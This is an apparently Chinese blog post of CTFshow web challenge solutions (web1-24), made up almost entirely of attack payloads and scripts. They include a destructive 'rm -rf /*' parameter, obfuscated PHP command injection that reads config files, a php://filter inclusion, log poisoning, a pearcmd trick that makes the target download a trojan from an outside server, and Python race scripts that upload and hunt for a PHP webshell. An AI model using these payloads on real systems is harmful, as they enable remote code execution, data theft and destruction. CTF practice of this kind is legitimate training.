CTFSHOW_萌新计划web1-24

最新推荐文章于 2024-06-01 12:50:40 发布

专注pwn0年

最新推荐文章于 2024-06-01 12:50:40 发布

阅读量793

点赞数

分类专栏： CTF 文章标签： php 开发语言

本文链接：https://blog.csdn.net/qq_46241655/article/details/126157449

版权

CTF 专栏收录该内容

38 篇文章 1 订阅

订阅专栏

随便写一下

WEB1

?id='1000'

?id=-1 or id=1000

WEB2

?id='1000'

WEB3

?id='1000'

WEB4

?id='1000'

WEB5

?id=~~1000

WEB6

?id=~~1000

WEB7

?id=0b1111101000

WEB8

?flag=rm -rf /*

WEB9

?c=highlight_file('config.php');

WEB10

?c=passthru(%22cat%20config.php%22);

WEB11

?c=$a='sys';$b='tem';$d=$a.$b;$e=ca;$d($e."t config.php");

再查看源代码

WEB12

?c=$a=base64_decode("c3lzdGVt");$b=base64_decode("dGFjIGNvbmZpZy5waHA=");$a($b);

WEB13

?c=passthru(base64_decode('dGFjIGNvbmZpZy5waHA='))?>

WEB14

?c=echo `$_GET[a]`?>&a=tac config.php

WEB15

?c=include%20$_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

WEB16

查md5

?c=36d

WEB17-21

日志包含
下面是蚁件连接地址

http://2f06eecf-c349-471c-b2a0-4b77ee150725.challenge.ctf.show/?c=/var/log/nginx/access.log

WEB22

自己服务器上弄一个木马e.php

<?php
echo "<?php system('tac 36d.php');?>";
?>

让靶机下载这个木马

http://xxxx/?c=pearcmd&+download+http://xxxxxxxxx/e.php

最后直接访问这个木马

http://xxxxx/e.php

获得百分之百的快乐

?1=>nl
?1=*

WEB23

把网上传的最常见的脚本的一部分内容改了一下

ts = int(time.mktime(time.strptime(txt[8:22], "%Y%m%d%H%M%S")))
fname = time.strftime("%Y%m%d%H%M%S", time.localtime(ts + 1))

改成下面内容，更好理解

fname=str(int(txt[8:22])+1)

import requests,time,threading

subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"

def newThread(fun,*args):
    return threading.Thread(target=fun, args=args)

def execphp(fname):
    r = requests.get(subaddr + "uploads/" + fname + ".php")
    x = r.text
    if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
        print(x)

def check(fname):
    for i in range(100,400):
        # 每个文件名单起一个线程
        newThread(execphp, fname + str(i)).start()

def upload():
    while True:
        file_data = {'file':('anything.php',"<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(subaddr+"upload.php",files=file_data)
        txt = r.text
        print("uploaded:",txt)
        # 用本次的文件名推算下一次的文件名，相差sleep一次的时间间隔
        fname=str(int(txt[8:22])+1)
        # 单起一个线程，爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php
        newThread(check, fname).start()


if __name__ == '__main__':
    upload()

WEB24

import requests,time,threading

subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"

def newThread(fun,*args):
    return threading.Thread(target=fun, args=args)

def execphp(fname):
    r = requests.get(subaddr + "uploads/" + fname + ".php")
    x = r.text
    if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
        print(x)

def check(fname):
    for i in range(100,400):
        # 每个文件名单起一个线程
        newThread(execphp, fname + str(i)).start()

def upload():
    while True:
        file_data = {'file':('anything.php',"<?php system(\"ls -l ../\");?>".encode())}
        r = requests.post(subaddr+"upload.php",files=file_data)
        txt = r.text
        print("uploaded:",txt)
        # 用本次的文件名推算下一次的文件名，相差sleep一次的时间间隔
        fname=str(int(txt[8:22])+3)
        # 单起一个线程，爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php
        newThread(check, fname).start()


if __name__ == '__main__':
    upload()